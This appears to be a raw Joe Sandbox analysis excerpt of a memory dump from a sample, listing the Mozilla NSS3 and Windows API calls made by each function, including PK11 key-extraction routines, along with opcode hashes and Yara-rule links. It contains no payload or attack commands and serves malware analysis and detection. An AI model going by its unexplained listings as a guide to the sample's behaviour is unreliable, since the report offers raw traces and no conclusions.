DeleteCriticalSection.KERNEL32(?,?,?,?,6C7F7296,00000000), ref: 6C834530
free.MOZGLUE(?,?,?,?,?,6C7F7296,00000000), ref: 6C83453C
PORT_FreeArena_Util.NSS3 ref: 6C83454F

Part of subcall function 6C81CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C7FB1EE,D958E836,?,6C8351C5), ref: 6C81CAFA
Part of subcall function 6C81CAA0: PR_UnloadLibrary.NSS3(?,6C8351C5), ref: 6C81CB09

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: f41d270983f2719543365e8a664a3b068b83f1d517bb7164e96ff8303d9521b5
Instruction ID: 951cce23c214be5352fb2d8252adeccd73632ded5564ee8183dc73fad1f766c8
Opcode Fuzzy Hash: f41d270983f2719543365e8a664a3b068b83f1d517bb7164e96ff8303d9521b5
Instruction Fuzzy Hash: 193170B0A04A258FCB20AF78C184559BBF0FF85319F016A69D89D97B00E735E894CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C84CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C84CD93,?), ref: 6C84CEEE

Part of subcall function 6C8414C0: TlsGetValue.KERNEL32 ref: 6C8414E0
Part of subcall function 6C8414C0: EnterCriticalSection.KERNEL32 ref: 6C8414F5
Part of subcall function 6C8414C0: PR_Unlock.NSS3 ref: 6C84150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C84CD93,?), ref: 6C84CEFC

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C84CD93,?), ref: 6C84CF0B

Part of subcall function 6C840840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8408B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C84CD93,?), ref: 6C84CF1D

Part of subcall function 6C83FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C838D2D,?,00000000,?), ref: 6C83FB85
Part of subcall function 6C83FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C83FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C84CD93,?,?,?,?,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF78

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 5ac13971caf08c9985989db0761e7998135eedcbe91549d75ed1bcab8a818b86
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: EE11E7B1E002085BE720AB6A7E41B6B75EC9F5414DF008839EC09D7B42FBA5D91C86F1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7F8C1B
EnterCriticalSection.KERNEL32 ref: 6C7F8C34
PL_ArenaAllocate.NSS3 ref: 6C7F8C65
PR_Unlock.NSS3 ref: 6C7F8C9C
PR_Unlock.NSS3 ref: 6C7F8CB6

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

Strings

KRAM, xrefs: 6C7F8C8F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: e8da39c091512c01e32d6787a5beddf2567b2ba1b093a921b5eaea5f8af82b3f
Instruction ID: aa8cb11b38e55a88d7bf56b54401f4618da00392de113377058285e5a0cb0ff5
Opcode Fuzzy Hash: e8da39c091512c01e32d6787a5beddf2567b2ba1b093a921b5eaea5f8af82b3f
Instruction Fuzzy Hash: FD2191B16056018FD700AF39C5D8559BBF4FF06304F0589BED8988B701EB31D886CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C88A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6C88A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C88A415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6C88A5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6C88A5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6C88A5C8

Part of subcall function 6C82ADC0: TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE10
Part of subcall function 6C82ADC0: EnterCriticalSection.KERNEL32(?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE24
Part of subcall function 6C82ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C80D079,00000000,00000001), ref: 6C82AE5A
Part of subcall function 6C82ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE6F
Part of subcall function 6C82ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AE7F
Part of subcall function 6C82ADC0: TlsGetValue.KERNEL32(?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEB1
Part of subcall function 6C82ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C80CDBB,?,6C80D079,00000000,00000001), ref: 6C82AEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6C88A5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C88A5E8

Strings

*@, xrefs: 6C88A589

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: 94844d9a3b0b399c3dc2c2cf48c25594153dac7638d72866f0b4a85225b2b2ff
Instruction ID: 2c79027d5e756cf0ba8e98296ba69bfba5891abcaf439e6c5a1112fdaf0d91ef
Opcode Fuzzy Hash: 94844d9a3b0b399c3dc2c2cf48c25594153dac7638d72866f0b4a85225b2b2ff
Instruction Fuzzy Hash: DA21F6B1C0420897C7109F59DE016DFBBB4AF8931CF054628EC58237C1E734A6998BD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C8F2CA0
PR_ExitMonitor.NSS3 ref: 6C8F2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C8F2CD1
strdup.MOZGLUE(?), ref: 6C8F2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C8F2D27

Strings

Loaded library %s (static lib), xrefs: 6C8F2D22

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 5c54ad75d86bee8fe9863b3820665adbc873434bdc6625366cc85114b6053919
Instruction ID: 1a59ba99bb56557cb4522cc7e967e18f6915e1968c087c184325b1313b9eda3b
Opcode Fuzzy Hash: 5c54ad75d86bee8fe9863b3820665adbc873434bdc6625366cc85114b6053919
Instruction Fuzzy Hash: 591138B07052948FEB24AF19D94866637B4AB4638EF24C93DDC19C7B01D735E819CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C840FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016

Part of subcall function 6C8A98D0: calloc.MOZGLUE(00000001,00000084,6C7D0936,00000001,?,6C7D102C), ref: 6C8A98E5

PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B
TlsGetValue.KERNEL32(00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841044
free.MOZGLUE(00000000,?,00000800,6C7DEF74,00000000), ref: 6C841064

Strings

security, xrefs: 6C841025

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 1f87e941e01a660be6487b6bad7fdb61a778d90c17755651874fc5361bdf8627
Instruction ID: 98286b8ec786362da15c6c533ef31d5ceba47741032160b2a35527e22c284abf
Opcode Fuzzy Hash: 1f87e941e01a660be6487b6bad7fdb61a778d90c17755651874fc5361bdf8627
Instruction Fuzzy Hash: FB016B3060465C9BE7307F3D8E09B567AA8BF4274AF118A26E80CD7E51EB70C164DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C870570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C85C89B,FFFFFE80,?,6C85C89B), ref: 6C87058B
free.MOZGLUE(?,?,6C85C89B), ref: 6C870592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C85C89B), ref: 6C8705AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C85C89B), ref: 6C8705C2
DeleteCriticalSection.KERNEL32(6C85C89B,?,6C85C89B), ref: 6C8705D8
free.MOZGLUE(?,?,6C85C89B), ref: 6C8705DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6C85C89B), ref: 6C8705FB

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: 6c2c15895d3cf971d9fce273a640364143d9121eb3753e6172da83e20f4d1f49
Instruction ID: 87d51b29e054f7750118a127b7f84c692a2d92bfa7d585f491a34bf7192c54cf
Opcode Fuzzy Hash: 6c2c15895d3cf971d9fce273a640364143d9121eb3753e6172da83e20f4d1f49
Instruction Fuzzy Hash: DB012D71A0EA645BEF30BFA49E0DB4D3B74670631DF600520E50AE2F81E371511483A5

Uniqueness

Uniqueness Score: -1.00%

Function 6C882E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C883046

Part of subcall function 6C86EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C86EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C857FFB), ref: 6C88312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C883154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C882E8B

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

Part of subcall function 6C86F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C859BFF,?,00000000,00000000), ref: 6C86F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C857FFA), ref: 6C882EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C88317B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 607b093dc500d1a5a79b2d7aa07192a8f96c17e110680b8b37337cd362ccb459
Instruction ID: 71458539dc4358b0ba967b0fd5168d048d0843012b2ddc5aa25abe03219d8977
Opcode Fuzzy Hash: 607b093dc500d1a5a79b2d7aa07192a8f96c17e110680b8b37337cd362ccb459
Instruction Fuzzy Hash: E2A1BD75A002189FDB34CF58CD80BEAB7B5EF49308F0485A9E94967B81E731AD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C84ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C84ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C84EDCE

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

free.MOZGLUE(00000000,?,?,?,?,6C84B04F), ref: 6C84EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C84EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C84EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C84EEFB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 634d43e4ce38254e136bb961f20cd82ea0e763ff1c2c4cffa606b9c448a92a2a
Instruction ID: 854a920ab0a5b62aafd8084b31f13ba04366ecd6eb224cf7df4a2c7023f2a37e
Opcode Fuzzy Hash: 634d43e4ce38254e136bb961f20cd82ea0e763ff1c2c4cffa606b9c448a92a2a
Instruction Fuzzy Hash: B5815EB5A002099FEB24CF59DA84FABB7F5BF48308F14882CE9159B751D730E815CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C84CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C84C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C84DAE2,?), ref: 6C84C6C2

PR_Now.NSS3 ref: 6C84CD35

Part of subcall function 6C8A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DC6
Part of subcall function 6C8A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DD1
Part of subcall function 6C8A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8A9DED

Part of subcall function 6C836C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7E1C6F,00000000,00000004,?,?), ref: 6C836C3F

PR_GetCurrentThread.NSS3 ref: 6C84CD54

Part of subcall function 6C8A9BF0: TlsGetValue.KERNEL32(?,?,?,6C8F0A75), ref: 6C8A9C07

Part of subcall function 6C837260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7E1CCC,00000000,00000000,?,?), ref: 6C83729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C84CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C84CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C84CE2C

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C84CE40

Part of subcall function 6C8414C0: TlsGetValue.KERNEL32 ref: 6C8414E0
Part of subcall function 6C8414C0: EnterCriticalSection.KERNEL32 ref: 6C8414F5
Part of subcall function 6C8414C0: PR_Unlock.NSS3 ref: 6C84150D

Part of subcall function 6C84CEE0: PORT_ArenaMark_Util.NSS3(?,6C84CD93,?), ref: 6C84CEEE
Part of subcall function 6C84CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C84CD93,?), ref: 6C84CEFC
Part of subcall function 6C84CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C84CD93,?), ref: 6C84CF0B
Part of subcall function 6C84CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C84CD93,?), ref: 6C84CF1D

Part of subcall function 6C84CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF47
Part of subcall function 6C84CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF67
Part of subcall function 6C84CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C84CD93,?,?,?,?,?,?,?,?,?,?,?,6C84CD93,?), ref: 6C84CF78

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 9b121403d3a5252c91d1d5fde2f243c6082b83f79c92c205fb8b0afacbb9507b
Instruction ID: 89e0799f4cc7b3a8703d640c5cc7192873c04b6e4cc2313262b27711ade7bad8
Opcode Fuzzy Hash: 9b121403d3a5252c91d1d5fde2f243c6082b83f79c92c205fb8b0afacbb9507b
Instruction Fuzzy Hash: 3851C676A001189BE720DF69DE40FAA77E8AF48348F258934D94997742FB31ED09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C84E680 Relevance: 9.2, APIs: 6, Instructions: 169threadmemoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C84E6C4

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

PR_GetCurrentThread.NSS3 ref: 6C84E6FE
PORT_ArenaGrow_Util.NSS3(?,?,?,00000000), ref: 6C84E726
PR_GetCurrentThread.NSS3 ref: 6C84E772
free.MOZGLUE(00000000), ref: 6C84E81F

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CurrentThreadUtil$Alloc_ArenaGrow_Valuefreemalloc
String ID:
API String ID: 1348558050-0
Opcode ID: a4c8cc9f51109ce20f82dc36f41759df56724168a6d6671b85788e9a0b3fc4ed
Instruction ID: 25a011dc3c0fc8985aca668d8a386300cb392b6b152c6a42879a30a0ed71fa77
Opcode Fuzzy Hash: a4c8cc9f51109ce20f82dc36f41759df56724168a6d6671b85788e9a0b3fc4ed
Instruction Fuzzy Hash: A9513075E0021D9FDF24CFA9C984AAAB7B5FF49318B148828E915A7B11D735EC11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8466C0 Relevance: 9.1, APIs: 6, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C8466DF

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
